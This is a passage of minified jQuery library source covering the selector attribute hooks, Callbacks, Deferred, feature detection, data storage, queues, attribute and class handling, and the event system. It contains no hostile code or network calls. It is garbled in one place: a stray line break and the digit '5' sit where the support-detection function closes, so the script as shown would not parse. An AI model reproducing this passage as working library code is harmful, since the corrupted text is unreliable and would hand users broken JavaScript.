e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||ct("value",function(e,n,r){return r||"input"!==e.nodeName.toLowerCase()?t:e.defaultValue}),ut(function(e){return null==e.getAttribute("disabled")})||ct(B,function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&i.specified?i.value:e[n]===!0?n.toLowerCase():null}),x.find=at,x.expr=at.selectors,x.expr[":"]=x.expr.pseudos,x.unique=at.uniqueSort,x.text=at.getText,x.isXMLDoc=at.isXML,x.contains=at.contains}(e);var O={};function F(e){var t=O[e]={};return x.each(e.match(T)||[],function(e,n){t[n]=!0}),t}x.Callbacks=function(e){e="string"==typeof e?O[e]||F(e):x.extend({},e);var n,r,i,o,a,s,l=[],u=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=l.length,n=!0;l&&o>a;a++)if(l[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,l&&(u?u.length&&c(u.shift()):r?l=[]:p.disable())},p={add:function(){if(l){var t=l.length;(function i(t){x.each(t,function(t,n){var r=x.type(n);"function"===r?e.unique&&p.has(n)||l.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=l.length:r&&(s=t,c(r))}return this},remove:function(){return l&&x.each(arguments,function(e,t){var r;while((r=x.inArray(t,l,r))>-1)l.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?x.inArray(e,l)>-1:!(!l||!l.length)},empty:function(){return l=[],o=0,this},disable:function(){return l=u=r=t,this},disabled:function(){return!l},lock:function(){return u=t,r||p.disable(),this},locked:function(){return!u},fireWith:function(e,t){return!l||i&&!u||(t=t||[],t=[e,t.slice?t.slice():t],n?u.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},x.extend({Deferred:function(e){var t=[["resolve","done",x.Callbacks("once memory"),"resolved"],["reject","fail",x.Callbacks("once memory"),"rejected"],["notify","progress",x.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return x.Deferred(function(n){x.each(t,function(t,o){var a=o[0],s=x.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&x.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?x.extend(e,r):r}},i={};return r.pipe=r.then,x.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=g.call(arguments),r=n.length,i=1!==r||e&&x.isFunction(e.promise)?r:0,o=1===i?e:x.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?g.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,l,u;if(r>1)for(s=Array(r),l=Array(r),u=Array(r);r>t;t++)n[t]&&x.isFunction(n[t].promise)?n[t].promise().done(a(t,u,n)).fail(o.reject).progress(a(t,l,s)):--i;return i||o.resolveWith(u,n),o.promise()}}),x.support=function(t){var n,r,o,s,l,u,c,p,f,d=a.createElement("div");if(d.setAttribute("className","t"),d.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav></:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="<table><tr><td></td><td>t</td></tr></table>",o=d.getElementsByTagName("td"),o[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===o[0].offsetHeight,o[0].style.display="",o[1].style.display="none",t.reliableHiddenOffsets=p&&0===o[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",x.swap(l,null!=l.style.zoom?{zoom:1}:{},function(){t.boxSizing=4===d.offsetWidth}),e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(a.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="<div></div>",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(l.style.zoom=1)),l.removeChild(n),n=d=o=r=null)}),n=s=l=u=r=o=null,t
5}({});var B=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,P=/([A-Z])/g;function R(e,n,r,i){if(x.acceptData(e)){var o,a,s=x.expando,l=e.nodeType,u=l?x.cache:e,c=l?e[s]:e[s]&&s;if(c&&u[c]&&(i||u[c].data)||r!==t||"string"!=typeof n)return c||(c=l?e[s]=p.pop()||x.guid++:s),u[c]||(u[c]=l?{}:{toJSON:x.noop}),("object"==typeof n||"function"==typeof n)&&(i?u[c]=x.extend(u[c],n):u[c].data=x.extend(u[c].data,n)),a=u[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[x.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=a[x.camelCase(n)])):o=a,o}}function W(e,t,n){if(x.acceptData(e)){var r,i,o=e.nodeType,a=o?x.cache:e,s=o?e[x.expando]:x.expando;if(a[s]){if(t&&(r=n?a[s]:a[s].data)){x.isArray(t)?t=t.concat(x.map(t,x.camelCase)):t in r?t=[t]:(t=x.camelCase(t),t=t in r?[t]:t.split(" ")),i=t.length;while(i--)delete r[t[i]];if(n?!I(r):!x.isEmptyObject(r))return}(n||(delete a[s].data,I(a[s])))&&(o?x.cleanData([e],!0):x.support.deleteExpando||a!=a.window?delete a[s]:a[s]=null)}}}x.extend({cache:{},noData:{applet:!0,embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(e){return e=e.nodeType?x.cache[e[x.expando]]:e[x.expando],!!e&&!I(e)},data:function(e,t,n){return R(e,t,n)},removeData:function(e,t){return W(e,t)},_data:function(e,t,n){return R(e,t,n,!0)},_removeData:function(e,t){return W(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&x.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),x.fn.extend({data:function(e,n){var r,i,o=null,a=0,s=this[0];if(e===t){if(this.length&&(o=x.data(s),1===s.nodeType&&!x._data(s,"parsedAttrs"))){for(r=s.attributes;r.length>a;a++)i=r[a].name,0===i.indexOf("data-")&&(i=x.camelCase(i.slice(5)),$(s,i,o[i]));x._data(s,"parsedAttrs",!0)}return o}return"object"==typeof e?this.each(function(){x.data(this,e)}):arguments.length>1?this.each(function(){x.data(this,e,n)}):s?$(s,e,x.data(s,e)):null},removeData:function(e){return this.each(function(){x.removeData(this,e)})}});function $(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(P,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:B.test(r)?x.parseJSON(r):r}catch(o){}x.data(e,n,r)}else r=t}return r}function I(e){var t;for(t in e)if(("data"!==t||!x.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}x.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=x._data(e,n),r&&(!i||x.isArray(r)?i=x._data(e,n,x.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=x.queue(e,t),r=n.length,i=n.shift(),o=x._queueHooks(e,t),a=function(){x.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return x._data(e,n)||x._data(e,n,{empty:x.Callbacks("once memory").add(function(){x._removeData(e,t+"queue"),x._removeData(e,n)})})}}),x.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?x.queue(this[0],e):n===t?this:this.each(function(){var t=x.queue(this,e,n);x._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&x.dequeue(this,e)})},dequeue:function(e){return this.each(function(){x.dequeue(this,e)})},delay:function(e,t){return e=x.fx?x.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=x.Deferred(),a=this,s=this.length,l=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=x._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(l));return l(),o.promise(n)}});var z,X,U=/[\t\r\n\f]/g,V=/\r/g,Y=/^(?:input|select|textarea|button|object)$/i,J=/^(?:a|area)$/i,G=/^(?:checked|selected)$/i,Q=x.support.getSetAttribute,K=x.support.input;x.fn.extend({attr:function(e,t){return x.access(this,x.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){x.removeAttr(this,e)})},prop:function(e,t){return x.access(this,x.prop,e,t,arguments.length>1)},removeProp:function(e){return e=x.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,l="string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).addClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=x.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,l=0===arguments.length||"string"==typeof e&&e;if(x.isFunction(e))return this.each(function(t){x(this).removeClass(e.call(this,t,this.className))});if(l)for(t=(e||"").match(T)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(U," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?x.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):x.isFunction(e)?this.each(function(n){x(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var t,r=0,o=x(this),a=e.match(T)||[];while(t=a[r++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else(n===i||"boolean"===n)&&(this.className&&x._data(this,"__className__",this.className),this.className=this.className||e===!1?"":x._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(U," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=x.isFunction(e),this.each(function(n){var o;1===this.nodeType&&(o=i?e.call(this,n,x(this).val()):e,null==o?o="":"number"==typeof o?o+="":x.isArray(o)&&(o=x.map(o,function(e){return null==e?"":e+""})),r=x.valHooks[this.type]||x.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=x.valHooks[o.type]||x.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(V,""):null==n?"":n)}}}),x.extend({valHooks:{option:{get:function(e){var t=x.find.attr(e,"value");return null!=t?t:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,l=0>i?s:o?i:0;for(;s>l;l++)if(n=r[l],!(!n.selected&&l!==i||(x.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&x.nodeName(n.parentNode,"optgroup"))){if(t=x(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n,r,i=e.options,o=x.makeArray(t),a=i.length;while(a--)r=i[a],(r.selected=x.inArray(x(r).val(),o)>=0)&&(n=!0);return n||(e.selectedIndex=-1),o}}},attr:function(e,n,r){var o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return typeof e.getAttribute===i?x.prop(e,n,r):(1===s&&x.isXMLDoc(e)||(n=n.toLowerCase(),o=x.attrHooks[n]||(x.expr.match.bool.test(n)?X:z)),r===t?o&&"get"in o&&null!==(a=o.get(e,n))?a:(a=x.find.attr(e,n),null==a?t:a):null!==r?o&&"set"in o&&(a=o.set(e,r,n))!==t?a:(e.setAttribute(n,r+""),r):(x.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(T);if(o&&1===e.nodeType)while(n=o[i++])r=x.propFix[n]||n,x.expr.match.bool.test(n)?K&&Q||!G.test(n)?e[r]=!1:e[x.camelCase("default-"+n)]=e[r]=!1:x.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!x.support.radioValue&&"radio"===t&&x.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{"for":"htmlFor","class":"className"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!x.isXMLDoc(e),a&&(n=x.propFix[n]||n,o=x.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var t=x.find.attr(e,"tabindex");return t?parseInt(t,10):Y.test(e.nodeName)||J.test(e.nodeName)&&e.href?0:-1}}}}),X={set:function(e,t,n){return t===!1?x.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&x.propFix[n]||n,n):e[x.camelCase("default-"+n)]=e[n]=!0,n}},x.each(x.expr.match.bool.source.match(/\w+/g),function(e,n){var r=x.expr.attrHandle[n]||x.find.attr;x.expr.attrHandle[n]=K&&Q||!G.test(n)?function(e,n,i){var o=x.expr.attrHandle[n],a=i?t:(x.expr.attrHandle[n]=t)!=r(e,n,i)?n.toLowerCase():null;return x.expr.attrHandle[n]=o,a}:function(e,n,r){return r?t:e[x.camelCase("default-"+n)]?n.toLowerCase():null}}),K&&Q||(x.attrHooks.value={set:function(e,n,r){return x.nodeName(e,"input")?(e.defaultValue=n,t):z&&z.set(e,n,r)}}),Q||(z={set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},x.expr.attrHandle.id=x.expr.attrHandle.name=x.expr.attrHandle.coords=function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&""!==i.value?i.value:null},x.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&r.specified?r.value:t},set:z.set},x.attrHooks.contenteditable={set:function(e,t,n){z.set(e,""===t?!1:t,n)}},x.each(["width","height"],function(e,n){x.attrHooks[n]={set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}}})),x.support.hrefNormalized||x.each(["href","src"],function(e,t){x.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),x.support.style||(x.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),x.support.optSelected||(x.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),x.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){x.propFix[this.toLowerCase()]=this}),x.support.enctype||(x.propFix.enctype="encoding"),x.each(["radio","checkbox"],function(){x.valHooks[this]={set:function(e,n){return x.isArray(n)?e.checked=x.inArray(x(e).val(),n)>=0:t}},x.support.checkOn||(x.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}function at(){try{return a.activeElement}catch(e){}}x.event={global:{},add:function(e,n,r,o,a){var s,l,u,c,p,f,d,h,g,m,y,v=x._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=x.guid++),(l=v.events)||(l=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof x===i||e&&x.event.triggered===e.type?t:x.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(T)||[""],u=n.length;while(u--)s=rt.exec(n[u])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),g&&(p=x.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=x.event.special[g]||{},d=x.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&x.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=l[g])||(h=l[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),x.event.global[g]=!0);e=null}},remove:function(e,t,n,r,i){var o,a,s,l,u,c,p,f,d,h,g,m=x.hasData(e)&&x._data(e);if(m&&(c=m.events)){t=(t||"").match(T)||[""],u=t.length;while(u--)if(s=rt.exec(t[u])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=x.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));l&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||x.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)x.event.remove(e,d+t[u],n,r,!0);x.isEmptyObject(c)&&(delete m.handle,x._removeData(e,"events"))}},trigger:function(n,r,i,o){var s,l,u,c,p,f,d,h=[i||a],g=v.call(n,"type")?n.type:n,m=v.call(n,"namespace")?n.namespace.split("."):[];if(u=f=i=i||a,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+x.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),l=0>g.indexOf(":")&&"on"+g,n=n[x.expando]?n:new x.Event(g,"object"==typeof n&&n),n.isTrigger=o?2:3,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:x.makeArray(r,[n]),p=x.event.special[g]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!x.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(u=u.parentNode);u;u=u.parentNode)h.push(u),f=u;f===(i.ownerDocument||a)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((u=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(x._data(u,"events")||{})[n.type]&&x._data(u,"handle"),s&&s.apply(u,r),s=l&&u[l],s&&x.acceptData(u)&&s.apply&&s.apply(u,r)===!1&&n.preventDefault();if(n.type=g,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(h.pop(),r)===!1)&&x.acceptData(i)&&l&&i[g]&&!x.isWindow(i)){f=i[l],f&&(i[l]=null),x.event.triggered=g;try{i[g]()}catch(y){}x.event.triggered=t,f&&(i[l]=f)}return n.result}},dispatch:function(e){e=x.event.fix(e);var n,r,i,o,a,s=[],l=g.call(arguments),u=(x._data(this,"events")||{})[e.type]||[],c=x.event.special[e.type]||{};if(l[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=x.event.handlers.call(this,e,u),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((x.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,l),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],l=n.delegateCount,u=e.target;if(l&&u.nodeType&&(!e.button||"click"!==e.type))for(;u!=this;u=u.parentNode||this)if(1===u.nodeType&&(u.disabled!==!0||"click"!==e.type)){for(o=[],a=0;l>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?x(r,this).index(u)>=0:x.find(r,this,null,[u]).length),o[r]&&o.push(i);o.length&&s.push({elem:u,handlers:o})}return n.length>l&&s.push({elem:this,handlers:n.slice(l)}),s},fix:function(e){if(e[x.expando])return e;var t,n,r,i=e.type,o=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new x.Event(o),t=r.length;while(t--)n=r[t],e[n]=o[n];return e.target||(e.target=o.srcElement||a),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,o,s=n.button,l=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||a,o=i.documentElement,r=i.body,e.pageX=n.clientX+(o&&o.scrollLeft||r&&r.scrollLeft||0)-(o&&o.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(o&&o.scrollTop||r&&r.scrollTop||0)-(o&&o.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&l&&(e.relatedTarget=l===e.target?n.toElement:l),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==at()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===at()&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},click:{trigger:function(){return x.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t},_default:function(e){return x.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=x.extend(new x.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?x.event.trigger(i,null,t):x.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},x.removeEvent=a.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},x.Event=function(e,n){return this instanceof x.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&x.extend(this,n),this.timeStamp=e&&e.timeStamp||x.now(),this[x.expando]=!0,t):new x.Event(e,n)},x.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},x.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){x.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!x.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),x.support.submitBubbles||(x.event.special.submit={setup:function(){return x.nodeName(this,"form")?!1:(x.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=x.nodeName(n,"input")||x.nodeName(n,"button")?n.form:t;r&&!x._data(r,"submitBubbles")&&(x.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),x._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&x.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return x.nodeName(this,"form")?!1:(x.event.remove(this,"._submit"),t)}}),x.support.changeBubbles||(x.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(x.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),x.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),x.event.simulate("change",this,e,!0)})),!1):(x.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!x._data(t,"changeBubbles")&&(x.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||x.event.simulate("change",this.parentNode,e,!0)}),x._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return x.event.remove(this,"._change"),!Z.test(this.nodeName)}}),x.support.focusinBubbles||x.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){x.event.simulate(t,e.target,x.event.fix(e),!0)};x.event.special[t]={setup:function(){0===n++&&a.addEventListener(e,r,!0)},teardown:function(){0===--n&&a.removeEventListener(e,r,!0)}}}),x.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return x().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=x.guid++)),this.each(function(){x.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return 